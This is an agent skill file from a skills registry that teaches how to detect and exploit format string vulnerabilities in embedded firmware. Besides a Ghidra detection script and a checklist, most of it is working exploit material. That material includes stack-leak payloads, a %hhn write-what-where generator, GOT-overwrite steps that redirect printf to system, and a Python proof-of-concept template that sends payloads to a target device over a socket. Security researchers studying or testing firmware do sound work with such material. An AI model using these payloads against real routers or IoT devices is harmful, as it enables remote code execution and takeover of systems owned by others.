Format string vulnerability detection and exploitation in embedded firmware binaries, covering ARM, MIPS, and x86 architectures
Install
npx skillscat add tangjunyi23/iotagent/format-string-exploitation Install via the SkillsCat registry.
SKILL.md
Format String Vulnerability Analysis
Overview
Format string vulnerabilities occur when user-controlled input is passed directly as the format argument to printf-family functions. In embedded systems, these are especially dangerous due to the typical absence of ASLR, stack canaries, and other mitigations.
Dangerous Function Identification
Target Functions
| Function | Library | Risk Level |
|---|---|---|
printf(user_input) |
libc | Critical |
fprintf(fp, user_input) |
libc | Critical |
sprintf(buf, user_input) |
libc | Critical |
snprintf(buf, n, user_input) |
libc | Critical |
syslog(priority, user_input) |
libc | Critical |
vprintf(user_input, va) |
libc | Critical |
dprintf(fd, user_input) |
libc | High |
err/warn(user_input) |
BSD libc | High |
setproctitle(user_input) |
BSD | High |
custom_log(user_input) |
vendor | High |
Detection via Static Analysis
# Search for direct format string usage patterns in binary
# These strings near printf calls suggest vulnerability:
strings firmware_binary | grep -n '%s\|%x\|%n\|%p\|%d'
# In disassembly: look for printf/sprintf where format string
# comes from register rather than .rodata/.data section
# Ghidra: cross-reference printf-family and check first format argument
# If format arg is on stack or from function parameter → likely vulnerableAutomated Detection with Ghidra
# Ghidra Python script: Detect potential format string vulnerabilities
from ghidra.program.model.symbol import SymbolType
PRINTF_FUNCS = ["printf", "fprintf", "sprintf", "snprintf", "syslog",
"vprintf", "vsprintf", "vsnprintf", "dprintf",
"warn", "warnx", "err", "errx"]
fm = currentProgram.getFunctionManager()
refMgr = currentProgram.getReferenceManager()
listing = currentProgram.getListing()
for func in fm.getFunctions(True):
name = func.getName().lower()
if any(pf in name for pf in PRINTF_FUNCS):
refs = getReferencesTo(func.getEntryPoint())
for ref in refs:
caller = getFunctionContaining(ref.getFromAddress())
if caller:
print(f"[!] {func.getName()} called from {caller.getName()} @ {ref.getFromAddress()}")
# TODO: Check if format argument is user-controlledExploitation Techniques
Information Disclosure
# Read stack values
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
# Direct parameter access (find offset where AAAA appears):
AAAA%1$08x AAAA%2$08x AAAA%3$08x ... AAAA%N$08x
# When output shows 41414141 → offset N is where input lands on stack
# Read arbitrary memory (once offset is known, e.g., N=7):
# Place target address at offset, use %s to dereference
python3 -c "import struct; print(struct.pack('<I', 0x080491a0).decode('latin1') + '%7\$s')"Architecture-Specific Stack Layout
ARM (32-bit)
# Arguments 1-4 in R0-R3, remaining on stack
# Format string is typically R0 (printf) or R1 (fprintf/sprintf)
# Stack arguments start at offset where SP points
# Exploitation offset calculation:
# R0 = format string pointer
# R1-R3 = first 3 format arguments (from registers)
# Stack[0], Stack[1], ... = subsequent arguments
# Input buffer offset depends on function prologue
# Typical: input appears at offset 4-12 on stackMIPS (32-bit)
# Arguments 1-4 in $a0-$a3, remaining on stack
# Format string in $a0
# $a1-$a3 cover first 3 format specifiers
# Stack arguments at SP+16, SP+20, ...
# MIPS calling convention reserves 16 bytes at top of stack
# for register save area (home area for $a0-$a3)
# This affects offset calculation by +4 words
# Note: MIPS has branch delay slots — exploitation requires
# careful gadget selection to account for delay slot instructionsx86 (32-bit)
# All arguments on stack, right-to-left push order
# Stack layout at printf call:
# ESP+0: return address
# ESP+4: format string pointer
# ESP+8: arg1 (first %x reads this)
# ESP+12: arg2
# ...
# Input buffer typically at offset 5-15 words from format stringWrite Primitive (%n)
# %n writes number of bytes printed so far to address on stack
# Direct parameter: %N$n writes to address at offset N
# Write arbitrary value strategy:
# 1. Place target address at known stack offset (e.g., offset 7)
# 2. Print exact number of characters needed
# 3. Use %n to write count to target address
# Example: Write 0x41424344 to address at offset 7
# Split into byte writes using %hhn (writes single byte):
# Write byte 0x44 (68 decimal):
python3 -c "
import struct
addr = 0x080491a0
# Write 4 bytes using %hhn (1 byte at a time)
payload = struct.pack('<I', addr) # byte 0
payload += struct.pack('<I', addr + 1) # byte 1
payload += struct.pack('<I', addr + 2) # byte 2
payload += struct.pack('<I', addr + 3) # byte 3
# Offset 7 for first addr, 8 for second, etc.
payload += b'%52c%7\$hhn' # writes 0x44 (68-16=52 padding)
payload += b'%1c%8\$hhn' # writes 0x45 (69-68=1 padding)
payload += b'%1c%9\$hhn' # writes 0x46
payload += b'%1c%10\$hhn' # writes 0x47
print(payload.decode('latin1'))
"GOT Overwrite (No RELRO)
# Overwrite Global Offset Table entry to redirect function calls
# 1. Identify target function's GOT entry address
# 2. Use format string %n to write shellcode address / system() address
# In embedded Linux with no ASLR:
# objdump -R binary | grep printf → GOT entry for printf
# Overwrite printf@GOT → system@plt
# Next printf(user_input) call becomes system(user_input)
# Embedded bare-metal:
# Overwrite function pointer in interrupt vector table
# Or overwrite callback function pointer in global config structEmbedded-Specific Considerations
No ASLR Exploitation
# Most embedded devices have no ASLR
# → All addresses are fixed and predictable
# → GOT addresses, stack addresses, heap addresses all constant
# → Single exploitation attempt sufficient (no brute force needed)
# Verify ASLR status:
cat /proc/sys/kernel/randomize_va_space
# 0 = disabled (common in embedded)Bare-Metal / RTOS Targets
# On bare-metal or RTOS without MMU:
# - No GOT/PLT (statically linked)
# - Target function pointers in RAM:
# - ISR vector table (if in RAM)
# - Callback function pointers in structs
# - Timer callback pointers
# - Network receive handler pointers
# Memory layout is fully predictable from binary analysisLimited Output Channels
# When printf output goes to:
# - UART only → connect serial to read output
# - Syslog → read /var/log/messages remotely
# - Buffer in memory → extract via other vulnerabilities
# - Nowhere (void context) → blind format string
# Blind format string exploitation:
# 1. Use %n to write without needing output
# 2. Overwrite return address or function pointer
# 3. Redirect execution to attacker-controlled payload
# 4. Confirm success via side channel (timing, network behavior)PoC Template
#!/usr/bin/env python3
"""Format String Exploit Template for Embedded Target"""
import struct
import socket
TARGET_IP = "192.168.1.1"
TARGET_PORT = 80 # or telnet/custom service port
# Architecture: set pack format
ARCH = "arm" # arm | mips | x86
ENDIAN = "<" # < little-endian, > big-endian
PACK_FMT = f"{ENDIAN}I" # 32-bit word
# Step 1: Find format string offset
def find_offset():
"""Send format strings to discover input offset on stack."""
for i in range(1, 32):
payload = f"AAAA%{i}$08x"
resp = send_payload(payload)
if "41414141" in resp:
print(f"[+] Input at offset: {i}")
return i
return None
# Step 2: Build write-what-where payload
def build_payload(target_addr: int, value: int, offset: int) -> bytes:
"""Build %hhn payload to write 'value' to 'target_addr'."""
payload = b""
bytes_to_write = [(value >> (i * 8)) & 0xFF for i in range(4)]
# Pack 4 target addresses
for i in range(4):
payload += struct.pack(PACK_FMT, target_addr + i)
written = len(payload)
for i, byte_val in enumerate(bytes_to_write):
pad = (byte_val - written) % 256
if pad > 0:
payload += f"%{pad}c".encode()
else:
pass # already at correct count
payload += f"%{offset + i}$hhn".encode()
written = byte_val
return payload
def send_payload(payload):
"""Send payload to target — adapt to specific protocol."""
# Adapt this for HTTP, Telnet, custom protocol, etc.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET_IP, TARGET_PORT))
s.send(payload.encode() if isinstance(payload, str) else payload)
resp = s.recv(4096)
s.close()
return resp.decode(errors='replace')
if __name__ == "__main__":
offset = find_offset()
if offset:
print(f"[+] Building exploit for offset {offset}")
# Example: overwrite GOT entry
# payload = build_payload(GOT_ADDR, SYSTEM_ADDR, offset)
# send_payload(payload)Detection Checklist
- Static binaries —
strings binary | grep -c '%'— high count near printf xrefs - Decompiled code — format argument sourced from function parameter, not string literal
- Network input paths — HTTP headers, SNMP community strings, MQTT topics, syslog messages
- Config file parsers — hostname, SSID, device name fields used in log messages
- Web interface — CGI parameters passed to system logging functions